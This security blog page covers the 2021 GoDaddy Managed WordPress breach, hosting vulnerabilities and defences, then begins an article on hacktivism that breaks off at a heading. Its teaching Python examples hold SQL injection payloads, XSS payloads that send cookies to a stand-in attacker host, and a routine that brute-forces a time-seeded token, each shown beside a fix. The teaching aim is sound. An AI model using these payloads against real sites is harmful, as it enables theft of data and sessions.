  • Following website best practices, creating an incident response plan, and investing in cybersecurity training for employees can minimize your organization’s risk and help you avoid similar threats.

On November 22, 2021, the hosting platform GoDaddy revealed that an unauthorized third party had accessed their Managed WordPress hosting environment. Unfortunately, GoDaddy isn’t unique; many hosting providers remain vulnerable to similar attacks. In this article, we will discuss what is known about the incident so far.

What We Know About the Attack So Far

GoDaddy responded swiftly and effectively, working with law enforcement and an IT forensics firm to thoroughly investigate the incident and take appropriate steps to safeguard users. 

What Happened?

On November 17, GoDaddy identified suspicious activity inside their Managed WordPress hosting environment, triggering an internal investigation with the help of an IT forensics firm. It was later determined that an unauthorized third party had used a compromised password to access the provisioning system for their Managed WordPress legacy codebase.

In response to this troubling discovery, GoDaddy immediately blocked the unauthorized third party from their system and began alerting affected users. 

So far, the investigation reveals that the unauthorized third party had been using these compromised credentials to gain access to the system beginning on September 6, with a goal of obtaining private customer information, including:

  • The email addresses and customer numbers of as many as 1.2 million active and inactive Managed WordPress customers. GoDaddy noted that this exposure increases the risk of phishing attacks.
  • The original WordPress Admin passwords set on these accounts at provisioning time. As a precaution, any account still using its original WordPress Admin password was subject to a password reset.
  • The SFTP and database usernames and passwords of active customers. GoDaddy reset these passwords as soon as the exposure was discovered.
  • The SSL/TLS private keys of a subset of active customers. GoDaddy began issuing and installing new certificates for the affected accounts.

Six Additional Web Hosting Providers Impacted

GoDaddy has also revealed that six other web hosts have been impacted by this incident. All six are European resellers of GoDaddy’s Managed WordPress hosting services and include:

What is GoDaddy Doing to Address the Situation?

The investigation is ongoing, and in addition to the actions outlined above, all impacted customers will be contacted directly by the GoDaddy team and provided with specific details. Customers can also contact the GoDaddy team via their online help center, which also includes country-specific phone numbers. 


It Isn’t Just GoDaddy; All Hosting Providers Are Vulnerable

While GoDaddy is currently in the spotlight, incidents like this are hardly unique to one hosting provider. Cybercriminals frequently target websites, and many of those attacks are targeted at web hosting accounts.

Common web host vulnerabilities fall into three main categories: general web hosting vulnerabilities, shared hosting vulnerabilities, and VPS and cloud hosting vulnerabilities:

General Web Hosting Vulnerabilities

Botnet-Building Attempts

This is when attackers attempt to use publicly available exploits to hijack your web servers and use your infrastructure as part of a botnet (connected computers instructed by a third party to perform repetitive tasks) to attack other organizations. 

Less secure web hosting providers are particularly vulnerable. However, once these vulnerabilities are discovered, they are typically patched fairly quickly.

DDoS Attacks

DDoS (distributed denial of service) attacks flood web servers or other online services with traffic in an attempt to crash the system. This can be done either by a large group of cybercriminals or a single criminal commanding a botnet. The goal of DDoS attacks is to overload the server and prevent legitimate users from accessing a company’s services or products.

Web Server Misconfigurations

Many basic website owners, particularly those using low-cost shared hosting, often have no idea whether or not their servers have been correctly configured. This is problematic because misconfigured servers are often left vulnerable and may be running unpatched or outdated applications. 

Incorrectly configured servers may also fail to enforce access rights properly, and simply hiding restricted functions or leaving their URLs unlinked is unlikely to deter attackers. Attackers know the typical locations and parameter names of administrative pages, can enumerate them with automated tools, and will then brute-force whatever authentication they find.

Shared Hosting Vulnerabilities

If having your own server is like owning a single-family home, shared hosting environments act more like apartment buildings, where each account has its own unit within the larger structure. Unfortunately, that means a single attack can impact all of the accounts on a single server. 

Non-Siloed Environments

Organizations that opt for shared hosting are particularly exposed because these accounts live in one large pool. Though each account is allocated its own slice of resources, all of them run within a single environment, so all data, content, and other files sit on the same server and are separated only by the file structure and file permissions.

Since all of this data is stored in one location, shared hosting sites are intrinsically linked. This means that if an attacker is able to access the main directory, all sites within the pool may be at risk, and a single compromised account could provide the attacker with a way into the supposedly closed system.

Software Vulnerabilities

All types of hosting accounts can contain software vulnerabilities, but shared servers are typically more at risk. This is because the large number of accounts per server means that each server is likely to host a variety of different applications, each of which will need to be updated regularly to take advantage of security patches and other updated security measures. A single unpatched or out-of-date application may leave the entire server vulnerable.

Malware (Including Ransomware)

Malware, and particularly ransomware, is a growing problem. Though a ransomware attack may target any hosting provider, shared hosting servers are particularly ill-adapted to contain such an attack. Because multiple accounts are hosted on a single server, it is easy for a ransomware attack to spread from one company’s account and infect the rest of the accounts on the same server.

Shared IP Addresses

Shared hosting accounts also share IP addresses, with multiple sites typically being identified by a single IP address, much like all units in a single apartment building share one street address. Unfortunately, this means that if one account is compromised and begins sending out spam or otherwise behaving badly and is blacklisted by a company or service, all other sites sharing that IP address will be blacklisted as well. 

This is problematic because getting an IP address removed from a blacklist is typically quite difficult, and organizations are unlikely to cooperate if one of the accounts attached to that IP address continues to behave badly or disregard the organization’s terms of service.

woman review her computer settings and ensuring her cyber security are correct.

VPS & Cloud Hosting Vulnerabilities

Though virtual private servers (VPS) and cloud hosting are typically more secure than shared hosting, they are not immune. Because these environments are larger and more interconnected, a successful compromise offers attackers a bigger payoff, so attacks against them tend to be carried out by more experienced attackers using more advanced methods.

Cross-Site Request Forgery

Cross-site request forgery (CSRF, occasionally mislabeled “cross-site security forgery”) is a flaw in web applications that accept state-changing requests without verifying that the logged-in user actually intended to make them. It is dangerous because browsers attach a site’s session cookies to every request sent to that site, whether or not the user initiated it, so simply staying logged in to a poorly secured application is a risk.

During a CSRF attack, the end user is tricked into executing an unwanted action, such as transferring funds, on a web application in which they are currently authenticated. Using social engineering (such as sending a crafted link via chat or email), an attacker may be able to make users of a specific web application do what the attacker wants without ever having to learn a username or password.

This works because the attacker has already prepared the request they want performed (for example, a form that submits a funds transfer). When the unsuspecting user clicks the link, their browser sends that request to the application along with the user’s existing session cookie, so the application treats it as a legitimate action by a logged-in user and completes it before the user is even aware of what has happened.

This can be particularly devastating on admin accounts and can compromise the entire web application. 
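To make the mechanism concrete, here is an added example (not code from the original article and not from any real banking application) in Python: a funds-transfer handler that trusts the session cookie alone, next to one that also demands a per-session token the attacker’s page cannot read and rejects requests from a foreign Origin. The Request class, session store, balances and the bank.example / evil.example origins are constructed stand-ins for a web framework.

```python
"""CSRF: a transfer handler that trusts the session cookie alone, beside one
that also requires a session-bound token and checks the Origin header.

Added example, not code from the original article or any real application.
Request, the session store, the balances and the origins are constructed.
"""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://bank.example"      # assumed origin of the application
ATTACKER_ORIGIN = "https://evil.example"  # assumed origin of the attacker's page

SESSIONS: dict[str, dict[str, str]] = {}  # session id -> {"user", "csrf"}
BALANCES: dict[str, int] = {}


@dataclass
class Request:
    """The parts of an HTTP request the handlers look at."""
    method: str
    cookies: dict[str, str] = field(default_factory=dict)
    form: dict[str, str] = field(default_factory=dict)
    headers: dict[str, str] = field(default_factory=dict)


def login(user: str) -> str:
    """Create a session and a CSRF token bound to it; return the session id."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The token the application embeds in its own forms as a hidden field."""
    return SESSIONS[sid]["csrf"]


def _session_user(req: Request) -> str | None:
    sess = SESSIONS.get(req.cookies.get("session", ""))
    return sess["user"] if sess else None


def _transfer(src: str, dst: str, amount: int) -> tuple[int, str]:
    if BALANCES.get(src, 0) < amount:
        return 400, "insufficient funds"
    BALANCES[src] -= amount
    BALANCES[dst] = BALANCES.get(dst, 0) + amount
    return 200, "ok"


def transfer_vulnerable(req: Request) -> tuple[int, str]:
    """Checks only that a valid session cookie arrived. The browser attaches that
    cookie to cross-site form posts too, so a forged request looks identical."""
    user = _session_user(req)
    if req.method != "POST" or user is None:
        return 403, "not logged in"
    return _transfer(user, req.form["to"], int(req.form["amount"]))


def transfer_hardened(req: Request) -> tuple[int, str]:
    """Synchronizer-token pattern plus an Origin check: the attacker's page can
    make the victim's browser send the cookie, but it cannot read the token."""
    user = _session_user(req)
    if req.method != "POST" or user is None:
        return 403, "not logged in"
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site origin"
    expected = SESSIONS[req.cookies["session"]]["csrf"]
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, expected):  # constant-time compare
        return 403, "missing or invalid csrf token"
    return _transfer(user, req.form["to"], int(req.form["amount"]))


def forged_request(sid: str) -> Request:
    """What an auto-submitting form on the attacker's page makes the victim's
    browser send: the session cookie rides along, the token does not."""
    return Request("POST", cookies={"session": sid},
                   form={"to": "mallory", "amount": "50"},
                   headers={"Origin": ATTACKER_ORIGIN})


def legitimate_request(sid: str) -> Request:
    """A submission of the application's own form, token included."""
    return Request("POST", cookies={"session": sid},
                   form={"to": "bob", "amount": "10", "csrf_token": csrf_token_for(sid)},
                   headers={"Origin": SITE_ORIGIN})


def demo() -> dict[str, int]:
    """Forged request against both handlers, then a legitimate one against the
    hardened handler; returns status codes and the resulting balances."""
    SESSIONS.clear()
    BALANCES.clear()
    BALANCES.update({"alice": 100, "bob": 0, "mallory": 0})
    sid = login("alice")
    return {
        "forged_vs_vulnerable": transfer_vulnerable(forged_request(sid))[0],
        "forged_vs_hardened": transfer_hardened(forged_request(sid))[0],
        "legit_vs_hardened": transfer_hardened(legitimate_request(sid))[0],
        "alice": BALANCES["alice"],
        "mallory": BALANCES["mallory"],
    }
```

The forged request succeeds against the first handler and moves 50 out of alice’s account; the hardened handler rejects it and still accepts the application’s own form. In a real deployment, also set the session cookie with the SameSite=Lax or Strict attribute so the browser withholds it from cross-site posts in the first place; the token check then remains as defense in depth.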

SQL Injections

SQL injection occurs when an application builds a database query by concatenating untrusted input (such as a form field or URL parameter) directly into the SQL text. An attacker can then supply input that changes the meaning of the query, letting them read data they should never see (customer records, password hashes, financial data), modify or delete it, or, in some configurations, run commands on the database server itself.

This attack works like a form where the clerk carries out whatever instructions you write in the “name” box: instead of looking up one customer, the database is told to hand over every record in the table.
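The following Python is an added example (not code from the original article) showing the flaw and the fix side by side against an in-memory SQLite table: a lookup that pastes the username into the SQL text, a lookup that binds it as a parameter, and two constructed attacker inputs, one that returns every row and one that pulls the password-hash column the query never meant to expose. The users table and its rows are constructed for illustration.

```python
"""SQL injection: a query built by string formatting beside a parameterized one.

Added example, not code from the original article. The users table and its
rows are constructed in an in-memory SQLite database for illustration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three customers with password hashes and card digits."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, card_last4 TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, card_last4) VALUES (?, ?, ?)",
        [("alice", "$2b$12$hashA", "1111"),
         ("bob", "$2b$12$hashB", "2222"),
         ("carol", "$2b$12$hashC", "3333")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """Pastes the input into the SQL text: the input can rewrite the query."""
    sql = f"SELECT username, card_last4 FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> list[tuple]:
    """Binds the input as a parameter: the driver treats it purely as data."""
    sql = "SELECT username, card_last4 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"                                            # dump every row
UNION_EXFIL = "' UNION SELECT username, password_hash FROM users --"  # read another column


def demo() -> dict[str, list[tuple]]:
    """Run both attacker inputs through both lookups on a fresh database."""
    conn = make_db()
    return {
        "vulnerable_tautology": lookup_vulnerable(conn, TAUTOLOGY),
        "vulnerable_union": lookup_vulnerable(conn, UNION_EXFIL),
        "parameterized_tautology": lookup_parameterized(conn, TAUTOLOGY),
        "parameterized_alice": lookup_parameterized(conn, "alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the tautology input the vulnerable query becomes `WHERE username = '' OR '1'='1'` and returns all three customers; the UNION input appends a second SELECT and the trailing `--` comments out the closing quote, so password hashes come back in the card-number column. The parameterized version returns nothing for either payload because the whole string is compared, quotes and all, against the username column.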

Exploiting XSS Flaws

Cross-site scripting (XSS) flaws let an attacker inject script into pages that the application serves to other users, because user-supplied content is written into the page without proper escaping. The injected script runs in the victim’s browser with the same access as the legitimate site, so it can read confidential information, steal session cookies, or redirect legitimate users to fraudulent websites.

Attackers most commonly use XSS to capture usernames and passwords, or to send users to a fraudulent site that mimics a trusted one (such as a page designed to look almost exactly like your bank’s website) and trick them into entering their credit card number or other sensitive information. Because the script runs inside the victim’s authenticated session, it can also silently perform actions on their behalf, such as changing account settings or submitting transactions.
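As an added example (not code from the original article), the Python below renders a user comment two ways, once by interpolating raw input and once with context-appropriate escaping, then runs the output through an HTML parser that reports the script tags and on* event handlers a browser would execute. It goes slightly beyond the text by covering the attribute context as well as the page body, since an attacker who lands inside an attribute can break out of it without a `<script>` tag. The comment markup and both payloads are constructed for illustration.

```python
"""Stored XSS: a comment renderer that interpolates raw input, beside one that
escapes for the HTML body and for attribute values, checked with a parser.

Added example, not code from the original article. The comment markup and the
attacker payloads are constructed for illustration.
"""
import html
from html.parser import HTMLParser


def render_comment_vulnerable(author: str, body: str) -> str:
    """Writes user input straight into the page in both attribute and body context."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Escapes <, > and & for the body; also escapes quotes for the attribute."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body)}</p></div>')


class ActiveContentFinder(HTMLParser):
    """Collects script tags and on* event-handler attributes a browser would run."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler")


def active_content(markup: str) -> list[str]:
    """What attacker-controlled script could run in a victim's browser, if any."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Constructed attacker payloads: one for the body, one that breaks out of the attribute.
BODY_PAYLOAD = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
ATTR_PAYLOAD = '" onmouseover="fetch(\'https://evil.example/?c=\' + document.cookie)'


def demo() -> dict[str, list[str]]:
    """Render both payloads through both renderers and report live content."""
    return {
        "vulnerable": active_content(render_comment_vulnerable(ATTR_PAYLOAD, BODY_PAYLOAD)),
        "safe": active_content(render_comment_safe(ATTR_PAYLOAD, BODY_PAYLOAD)),
    }


if __name__ == "__main__":
    print(demo())
```

Escaping is context-specific: `html.escape` without `quote=True` would be enough for the paragraph body but would leave the `"` in the attribute payload intact, letting it close the attribute and start an `onmouseover` handler. Modern template engines escape by default for the HTML context; the flaw appears when that is bypassed with a “safe”/“raw” marker or when output is built with string formatting as above.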

Insecure Cryptography

Cryptographic algorithms depend on random numbers for keys, nonces, session identifiers and password-reset tokens, but not all random number generators are made equal. General-purpose (non-cryptographic) generators, or even cryptographic ones seeded with a guessable value such as the current time, can produce output that an attacker can predict or reconstruct, which undermines whatever the numbers were meant to protect.
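The following Python is an added example (not code from the original article) of what “easily guessable” means in practice. A token is generated from Python’s general-purpose Mersenne Twister seeded with the time it was issued; an attacker who knows roughly when that happened simply re-seeds the generator with every timestamp in a one-hour window until it reproduces the token. The same attack has nothing to search when the token comes from the operating system’s CSPRNG via the secrets module. The issue time and search window are constructed for illustration.

```python
"""Why a token from a predictable generator is not a secret: a PRNG seeded with
the issue time can be brute-forced by anyone who knows roughly when the token
was issued, whereas secrets.token_hex cannot be reproduced that way.

Added example, not code from the original article. The issue time and search
window are constructed for illustration.
"""
from __future__ import annotations

import random
import secrets


def weak_token(seed: int, nbytes: int = 16) -> str:
    """Password-reset style token from the non-cryptographic Mersenne Twister
    seeded with a guessable value (a Unix timestamp)."""
    rng = random.Random(seed)
    return rng.getrandbits(nbytes * 8).to_bytes(nbytes, "big").hex()


def strong_token(nbytes: int = 16) -> str:
    """Token from the operating system's CSPRNG; no seed for an attacker to guess."""
    return secrets.token_hex(nbytes)


def recover_seed(observed: str, approx_time: int, window: int = 3600) -> int | None:
    """Attacker's view: try every timestamp within `window` seconds of the
    estimated issue time until the generator reproduces the observed token."""
    for seed in range(approx_time - window, approx_time + window + 1):
        if weak_token(seed) == observed:
            return seed
    return None


def demo() -> dict[str, object]:
    """Issue a weak token, recover its seed from a two-minute-off estimate, and
    contrast with the strong token."""
    issued_at = 1_700_000_000                  # constructed issue time
    token = weak_token(issued_at)
    return {
        "recovered_seed": recover_seed(token, issued_at + 120),
        "weak_repeats": weak_token(issued_at) == token,
        "strong_repeats": strong_token() == strong_token(),
    }


if __name__ == "__main__":
    print(demo())
```

Once the seed is recovered the attacker can generate every token the application issued from that state, not just the one observed. The rule of thumb for any security-sensitive value is the secrets module (or os.urandom) in Python, and the equivalent CSPRNG in other languages, never a seeded general-purpose generator.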

Virtual Machine Vulnerabilities

Multiple virtual machines can be run on top of hypervisors in physical servers. However, if there is a vulnerability in the hypervisor, attackers may be able to infiltrate the system remotely and gain access to all virtual machines hosted on a physical server. Though this type of attack is rare, it is still possible, and organizations that use virtual machines should take appropriate steps to safeguard their infrastructure. 

Supply Chain Weaknesses

One of the benefits of cloud hosting is resource distribution, but unfortunately, this can also be a source of vulnerabilities. If not all organizations in the cloud supply chain are as studious as your organization about security, they could leave the entire chain vulnerable.

Insecure APIs

APIs (application programming interfaces) are designed to streamline cloud computing processes, but if they aren’t secured properly they can give attackers an easy way into your cloud infrastructure.

Because APIs are assembled from widely reused components, a flaw in one component can surface in many deployments, which makes this type of attack hard to defend against. An attacker doesn’t need a sophisticated exploit: they can simply probe the API for endpoints that lack authentication, accept default credentials, or skip authorization checks, repeating basic requests until one of them succeeds.

Steps You Can Take to Protect Your Organization & Your Website

In the modern era, it is an unfortunate truth that it isn’t so much if your organization will experience a cybersecurity incident, but when. Luckily, there are steps you can take to safeguard your website and your organization as a whole. 

Website Best Practices For Static Sites 

One of the best things you can do to safeguard your website is to make sure you are following website security best practices.

If you have a static site, make sure it is served over HTTPS with a valid SSL/TLS certificate and keep your software up to date. You should also monitor your website with uptime and content-integrity monitoring so that you are alerted any time your site undergoes an unexpected content change.

By keeping an eye on your website, you can quickly learn if an incident has occurred, allowing you to mitigate or even prevent damage if your website is defaced or otherwise compromised.

For WordPress or Other Database Websites (Like Those Impacted by the GoDaddy Attack)

There are a few things you can do to better safeguard your WordPress website. These include implementing a robust username and password policy and adding multi-factor authentication. If your site stores user passwords for any reason, make sure they are stored as salted hashes produced by a slow password-hashing algorithm, never in plaintext or reversible encryption, and consider delegating sign-in to an OAuth/OpenID Connect identity provider rather than handling credentials yourself.

You should also consider rate limiting logins or locking accounts after a number of failed login attempts. This helps safeguard your website from brute-force attacks. You should also strongly consider changing your admin username from the default “admin” to something harder to guess.

Rate limiting helps safeguard your website from botnets carrying out brute-force attacks. Rather than refusing logins outright, it inserts an artificial delay between attempts, and it is usually paired with a temporary lockout after a set number of consecutive failures. Even a seemingly insignificant delay of a second or two slows a brute-force attack dramatically, buying your organization time for someone to notice something is amiss and take appropriate action.
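The two controls described above (a growing delay between failed attempts and a lockout after a fixed number of consecutive failures) fit in a few dozen lines. The Python below is an added example (not code from the original article or from WordPress) that keeps per-key failure counters, doubles the required wait after each failure and locks the key for fifteen minutes once the threshold is reached. Timestamps are passed in explicitly, so the constructed attack timeline runs instantly rather than sleeping; the “admin” key and the attempt times are constructed for illustration.

```python
"""Login throttling with a growing delay between failed attempts and a lockout
after a set number of consecutive failures.

Added example, not code from the original article or from WordPress. Timestamps
are passed in explicitly so the constructed scenario runs without waiting.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class LoginThrottle:
    max_failures: int = 5          # consecutive failures before lockout
    lockout_seconds: float = 900   # how long a lockout lasts
    base_delay: float = 1.0        # wait after the first failure; doubles each time
    # key (username or client IP) -> (consecutive failures, time of last failure)
    failures: dict[str, tuple[int, float]] = field(default_factory=dict)

    def check(self, key: str, now: float) -> tuple[bool, float]:
        """Return (allowed, seconds the caller must still wait) for an attempt."""
        count, last = self.failures.get(key, (0, 0.0))
        if count >= self.max_failures:
            remaining = self.lockout_seconds - (now - last)
            if remaining > 0:
                return False, remaining
            del self.failures[key]           # lockout expired; start clean
            return True, 0.0
        if count == 0:
            return True, 0.0
        wait = self.base_delay * 2 ** (count - 1) - (now - last)
        return wait <= 0, max(wait, 0.0)

    def record(self, key: str, success: bool, now: float) -> None:
        """Reset the counter on success; otherwise bump it."""
        if success:
            self.failures.pop(key, None)
        else:
            count, _ = self.failures.get(key, (0, 0.0))
            self.failures[key] = (count + 1, now)


def attempt(throttle: LoginThrottle, key: str, password_ok: bool, now: float) -> str:
    """One login attempt; returns 'success', 'failure', 'throttled' or 'locked'.
    Throttled and locked attempts are not even checked against the password."""
    allowed, _wait = throttle.check(key, now)
    if not allowed:
        count, _ = throttle.failures.get(key, (0, 0.0))
        return "locked" if count >= throttle.max_failures else "throttled"
    throttle.record(key, password_ok, now)
    return "success" if password_ok else "failure"


# Constructed attack timeline against the 'admin' account: (seconds, password correct?)
ATTEMPTS = [(0, False), (0.5, False), (1, False), (2, False), (3, False),
            (7, False), (15, False), (16, True), (1000, True)]


def simulate(attempts: list[tuple[float, bool]] = ATTEMPTS) -> list[str]:
    """Replay the timeline through a fresh throttle and return each verdict."""
    throttle = LoginThrottle()
    return [attempt(throttle, "admin", ok, t) for t, ok in attempts]


if __name__ == "__main__":
    for (t, ok), verdict in zip(ATTEMPTS, simulate()):
        print(f"t={t:>6}  correct={ok!s:5}  {verdict}")
```

In the timeline, attempts that arrive before the required wait has elapsed are throttled without touching the password check, the fifth failure locks the account, the correct password at t=16 is refused while the lockout holds, and it succeeds once the lockout has expired. Key the throttle on both the username and the source IP address (a botnet spreads attempts across many addresses), and return the same response for unknown usernames so the throttle does not leak which accounts exist.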

You should also seriously consider moving your login page off the default path. WordPress is the most widely used content management system on Earth, and most WordPress websites still expose the default /wp-login.php and /wp-admin/ paths, so attackers and automated scanners know exactly where to look. Moving the login page to a non-default path won’t stop a determined attacker, but it filters out a great deal of automated noise and buys your team more time to respond.

Interview Your Hosting Provider & Review Your SLA Carefully

The GoDaddy security incident has demonstrated how much a website’s security depends on the security of its hosting provider. Though life, and cybersecurity, in particular, offer no guarantees, here are a few questions you should ask your hosting provider in light of this recent attack.

  1. Ask your hosting provider how they monitor their network. Suspicious activities can’t be stopped if they aren’t detected, so you want to make sure your hosting provider is carefully monitoring their internal network by asking them how their network is monitored, who is responsible for monitoring, and what sort of red flags they are actively looking for.
  2. Ask about their antivirus and malware scanning and removal processes. Malware continues to be a threat, so you need to know what sort of malware protection your host offers and what steps they take to secure your website. You should also ask if their support team is scanning your account and request a copy of these internal reports. You also need to be clear on what will happen if your account is infected and what steps your hosting provider will take to help you identify and remove malware on your website.
  3. Don’t forget SSL/TLS, firewalls, and DDoS prevention. Ask your provider what protocols they have in place to prevent attacks like the one GoDaddy experienced, and whether they offer a web application firewall and DDoS mitigation. You should also find out whether your hosting provider provisions and installs SSL/TLS certificates for you or whether obtaining, installing, and renewing them is something your team will need to handle.

You should be able to find at least some of this information in your SLA (service level agreement), but if the answers to any of these questions are missing, you should reach out to your contact at your hosting provider for more information.

You should also lock down the permissions on your folders and subdirectories so that unauthorized users cannot read back-end configuration files or upload files containing malware. You should also consider adding bot filters and maintaining an active blocklist to filter out bots and prevent brute-force attacks.

Create an Incident Response Plan & Invest in Cybersecurity Training for All Employees

When it comes to cybersecurity, it is always best to be proactive instead of reactive. A robust incident response plan in place will allow you to respond to attacks quickly and effectively while helping limit damage and make your recovery smoother.

For more information, please consider reading our educational guide on creating an effective incident response plan.

Beware of Possible Phishing Scams

In their statement, GoDaddy specified that customers whose email addresses were exposed are now more likely than ever to be targeted by phishing attacks. However, all organizations should ensure their employees know what sort of red flags to look for when it comes to phishing scams. To help improve your employee cybersecurity training and educate your team, please consider reviewing our educational article Don’t Let Phishing Scams Catch You Unaware.

Whether your organization has been directly impacted by the GoDaddy security incident or not, now is an excellent time to review your website’s cybersecurity best practices. For more information, or to start improving your cybersecurity stance, please contact our team today.

The Growing Trend of “Hacktivism”, & What it Means for Businesses


Last updated August 19, 2022

Summary:

  • “Hacktivism” occurs when activists digitally disrupt the systems or operations of a given organization—often to further political goals rather than specifically to cause injury or financial loss.
  • While certain examples of hacktivism (such as the participation of Wikileaks and Anonymous in Arab Spring) have garnered broad public support, they can also endanger innocents by exposing them to cybersecurity threats.
  • The anonymity of hacktivism allows its perpetrators to operate with impunity and eliminate their accountability—even to those they claim to be helping.
  • High-profile hacktivism incidents date back to the late 1980s and continue today, often costing millions of dollars for organizations and exposing the personal information of their customers. As such, it’s vital for organizations to invest in robust cybersecurity solutions.

When most people think of a hacker, they think of a loner hiding in a dark basement, destroying computer systems and other digital resources for personal financial gain, or a sophisticated computer whiz employed by a foreign government up to no good. 

However, in recent years, a growing number of hackers have been putting their skills to use for a different reason: activism. This trend, dubbed “hacktivism”, is on the rise and can have serious consequences for businesses of all sizes in all verticals and industries. 


What is Hacktivism?

Information security researcher Dorothy Denning defines hacktivism as “the marriage of hacking and activism”, more specifically, using computers to achieve a political agenda through legally ambiguous means. As a general rule, hacktivism aims to obstruct normal computer and business activities in some way but, unlike other forms of hacking, does not necessarily aim to cause permanent injury or significant financial loss and is rarely motivated by financial gain. 

Hacktivism Can Be a Force for Good….

When most readers think of hacktivism, they think of large-scale political movements and revolutions such as the Arab Spring, which depended at least in part on technology and hacktivism. 

In 2011, when young protesters took to the streets in cities across the Middle East to rally against oppressive governments, some who had held power for decades, they were emboldened and assisted by technology. In the eyes of some, WikiLeaks and Anonymous played a key role in creating the social conditions that allowed the Arab Spring to happen by posting damning secret government documents online before the protests began. 

A specific example of this hacktivism was the uprising in Tunisia, which was initially largely ignored by the foreign media. When members of Anonymous realized the significance of the uprising, they partnered with Tunisian dissidents to help them share videos of what was really going on on the ground with the outside world. They also created a “care packet” (available in English, Arabic, and French) that offered dissidents advice on how to conceal their identities on the internet to avoid detection by the former Tunisian regime’s cyberpolice.

Though most believe the Arab Spring to be a positive and necessary step, the hacktivism that accompanied it, particularly the act of disclosing confidential documents and personnel files indiscriminately, could endanger lives. Anonymous and similar hacktivist organizations do not always carefully vet what information they release, which could inadvertently expose innocent individuals to cybersecurity threats.

… But it Frequently Harms Innocent Organizations & Individuals

The goal of most hacktivists is to draw attention to a particular cause using virtual political activism. This can be a noble goal, as demonstrated during the Tunisian uprising, but not all hacktivists are so altruistic. Unfortunately, many hacktivists are also not particularly concerned about avoiding collateral damage while carrying out their activist activities, and innocent parties can be caught in the crossfire. 

For example, while protesting the police actions on the Bay Area Rapid Transit (BART) system in San Francisco, a hacktivist posted the full names, addresses, and cell phone numbers of over 2,000 MyBART subscribers (ordinary transit users) online, increasing their chances of being targeted by identity thieves and other criminals.

In a recent article by PC World, a former member of Anonymous called “SparkyBlaze” admitted that he was “fed up with [Anonymous] putting people’s data online and then claiming to be the big heroes.” He also stated that “Getting files and giving them to WikiLeaks, that sort of thing does hurt governments. But putting user names and passwords on a Pastebin doesn’t [affect governments], and posting the info of the people you fight for is just wrong.”

While some hacktivist organizations, like other activist organizations, might be doing real good, too many are using the guise of activism to cause significant harm to innocent organizations and individuals. 

As one article published in the Journal of Human Rights Practice puts it, unlike more familiar forms of activism, hacktivism can often be anonymous, allowing it to operate with a kind of impunity afforded by technology. As such, hacktivists are accountable to no one, not even the organizations, groups, and individuals they aim to help, which is deeply problematic.

Many hacktivist organizations, including Anonymous and WikiLeaks, engage in highly questionable activities, which they are able to do because of the anonymous nature of hacktivism. Since there is no way to hold individuals accountable, they are incredibly dangerous, both for the problematic organizations and governments they target and for the rest of us. 


A Brief History of Hacktivism: Six Infamous Events

While hacking has been around since the 1950s, hacktivism as a concept didn’t really emerge until 1989, when the first “hacktivist” action (referred to as Worms Against Nuclear Killers) took place. 

Worms Against Nuclear Killers (1989)

The 1989 attack, which many believe to be the work of Melbourne-based hackers “Electron” and “Phoenix”, used a worm to infiltrate computers at both NASA and the US Department of Energy. The worm altered the login screen of infected computers to display the message “Worms Against Nuclear Killers” and was fueled by rising anti-nuclear sentiment. A second worm, called OILZ, was also deployed and contained code designed to lock users out of accounts and files by changing passwords. The goal of the attack was to shut down the DECnet computer network in the days before a NASA launch, causing disruption and costing roughly half a million dollars in damages and lost time.

Hacktivism has only grown in both scope and influence. Other influential campaigns include:

Hacktivismo Declaration (2001)

Hacktivismo, an offshoot of the hacker group Cult of the Dead Cow (cDc), emerged when it released a declaration intended to elevate freedom of speech. In doing so, the group explicitly set out both to engage in civil disobedience and to explain the reasoning behind its actions.

The Hacktivismo Declaration cited two United Nations documents, the International Covenant on Civil and Political Rights and the Universal Declaration of Human Rights, and included an FAQ stating that the main purpose of the group’s actions was to “cite some internationally recognized documents that equate access of information with human and political rights”.

With this declaration, the group aimed to create both moral and legal grounds for future hacktivists to launch their campaigns. The group went on to release a web browser, called Peekabooty, designed to circumvent censorship by nation-states that deny or restrict internet access.

Project Chanology (2008)

When a video of actor Tom Cruise voicing his affiliation with the Church of Scientology appeared on YouTube, the church forced the video hosting platform to remove it. In response to the censorship, Anonymous launched a DDoS (Distributed Denial of Service) attack against the Church of Scientology website, which was also defaced. A series of prank calls and black faxes followed the DDoS attack, and Anonymous also distributed private church documents stolen from Scientology computers during a doxxing attack.

The hacktivist actions were paired with in-person protests across the country, where protesters donned the now-infamous Guy Fawkes masks associated with Anonymous.

US Executive Branch Attack (2013)

Believed to be associated with Syrian President Bashar al-Assad, the Syrian Electronic Army (SEA) has carried out a number of attacks using spear-phishing and DDoS techniques designed to compromise and deface government, media, and privately held organizational websites. 

The group successfully released a fake tweet claiming that an explosion at the White House had injured the President. After the tweet went live, the Dow briefly plunged 140 points. In 2016, the FBI charged two SEA-affiliated individuals with the attack.

Clinton Emails Leak (2016)

